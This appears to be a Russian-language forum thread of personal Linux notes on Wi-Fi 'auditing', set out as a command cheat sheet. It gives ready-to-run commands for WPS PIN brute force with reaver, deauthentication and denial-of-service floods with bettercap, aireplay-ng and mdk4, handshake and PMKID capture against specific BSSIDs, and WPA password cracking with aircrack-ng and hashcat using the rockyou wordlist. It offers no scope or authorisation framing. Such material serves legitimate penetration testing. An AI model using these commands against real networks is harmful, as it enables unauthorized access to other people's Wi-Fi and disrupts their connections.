"Форум на сайте Чагадаева"

Чагадаев как он есть => Руководства (howto) => Тема начата: adc от 22 Октября 2023 года, 01:02

Название: [manual, Linux, Wi-Fi]: аудит сетей
Отправлено: adc от 22 Октября 2023 года, 01:02
Wi-Fi: аудит WPS

OneShot  monitor mode.

чипсет тоже показывает                                                                                                                                       
wash -i wlan1

wifite -i wlan1


1. reaver - перебор пинов                                                                                                                                   
 reaver -i wlan1 -b D4:60:E3:E4:C1:86 -vv 


bettercap -iface wlan1
wifi.recon on
set ticker.commands 'clear; wifi.show'
ticker on
wifi.recon.channel 9
wifi.deauth 58:23:8c:7e:ed:13

Fluxion


• Атаки на WPA2-Enterprise, Rogue AP Evil Twin - https://habr.com/ru/articles/761450/
• Атаки на WPA2-Enterprise, методология взлома WPA3 - https://habr.com/ru/companies/bastion/articles/777182/
Название: [manual, Linux, network] Wi-Fi: управление Wi-Fi адаптером
Отправлено: adc от 07 Ноября 2023 года, 15:46
Режимы работы Wi-Fi адаптера

★ ★ ★

Отключить в NetworkManager управление интерфейсом wlan1 - для текущего сеанса
nmcli dev set wlan1 managed no

Отключить в NetworkManager управление интерфейсом wlan1 - в конфигурационном файле
Код: (/etc/NetworkManager/NetworkManager.conf) [Выделить]
[keyfile]
unmanaged-devices=interface-name:wlan1

Посмотреть в каком режиме работают Wi-Fi интерфейсы
iwconfig

Перевести Wi-Fi интерфейс wlan1 в режим мониторинга - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type monitor
ip link set wlan1 up

Перевести Wi-Fi интерфейс wlan1 в режим мониторинга, остановить мешающие процессы - средствами airmon-ng
airmon-ng check kill
airmon-ng start wlan1

Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами airmon-ng; запустить NetworkManager и wpa_supplicant
airmon-ng stop wlan1
systemctl start NetworkManager
systemctl start wpa_supplicant.service

Перевести Wi-Fi интерфейс wlan1 в обычный режим - средствами ОС
ip link set wlan1 down
iw dev wlan1 set type managed
ip link set wlan1 up
iwconfig
Название: [manual, Linux, Wi-Fi]: airodump-ng
Отправлено: adc от 27 Ноября 2023 года, 20:24
Список беспроводных сетей (значения столбцов)

Список беспроводных сетей и клиентов (значения столбцов)

★ ★ ★

Горячие клавиши:
"o" - включить цвет
"s" - изменить сортировку

★ ★ ★

Мониторинг эфира - интерфейс wlan1; диапазоны 2,4 ГГц и 5 ГГц; выводить производителя, параметры WPS и время работы точек доступа
airodump-ng wlan1 --band abg --wps --manufacturer --uptime

★ ★ ★

Захват трафика - интерфейс wlan1, канал 1, сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 -w wifi

Захват трафика - интерфейс wlan1, канал 1, точка доступа с BSSID 54..., сохранять пакеты в файл wifi
airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
Название: [manual, Linux, Wi-Fi]: захват PMKID
Отправлено: adc от 27 Ноября 2023 года, 21:32
Захват PMKID

1) Запустить airodump-ng на нужном интерфейсе и канале
2) Одновременно запустить hcxdumptool

airodump-ng wlan1 -c 1 --bssid 54:C2:50:AC:AE:C9 -w wifi
hcxdumptool -i wlan1 -c 149b -w pmkid.cap --filterlist_ap=targetBSSID --filtermode=2
hcxdumptool -i wlan1 -c 149b -w pmkid.cap
Название: [manual, Linux, Wi-Fi]: атака деаутентификации
Отправлено: adc от 27 Ноября 2023 года, 21:34
Деаутентификация
aireplay-ng wlan1 --deauth 20 -a <MAC точки доступа> -c <MAC подключённого клиента>
mdk4 wlan1 d -c <канал> -E <SSID>
mdk4 wlan1 d -c 1 -E 52:FF:20:90:98:C0

Beacon Flooding (generate many fake APs seen by clients - client confusion, crash network scanners)
mdk4 wlan1 b -a -w nta -m

Authentication DoS (ыimulate many clients - freeze/reset AP)
mdk4 wlan1 a -m -a 52:FF:20:90:98:C0

EAPOL Start Injection (keep AP busy with fake sessions - disable handling of legitimate clients)
mdk4 wlan1 e -t 52:FF:20:90:98:C0

EAPOL Logoff Injection (kick clients from AP)
mdk4 wlan1 e -t 52:FF:20:90:98:C0 -l
Название: [manual, Linux, Wi-Fi]: подбор хеша
Отправлено: adc от 27 Ноября 2023 года, 21:34
Подобрать хэш для пароля из дампа в файле wifi-01.cap
aircrack-ng wifi-01.cap -w /usr/share/dict/wordlist-probable.txt
aircrack-ng wifi-01.cap -w /!Dic/rockyou.txt

Очистить дамп от всех данных, кроме WPA handshake
wpaclean wifi-01_cleaned.cap wifi-01.cap

Конвертировать дамп от airodump-ng в вид, понятный hashcat
Подобрать хеш для пароля из файла wifi-01.hash
hcxpcapngtool wifi-01.cap -o wifi-01.hash
hashcat -m 22000 -a 0 wifi-01.hash /!Dic/rockyou.txt -o wifi-01.hash.result --session my-ses1


• Отдельная тема по hashcat - https://adc.su/forum/index.php?topic=6337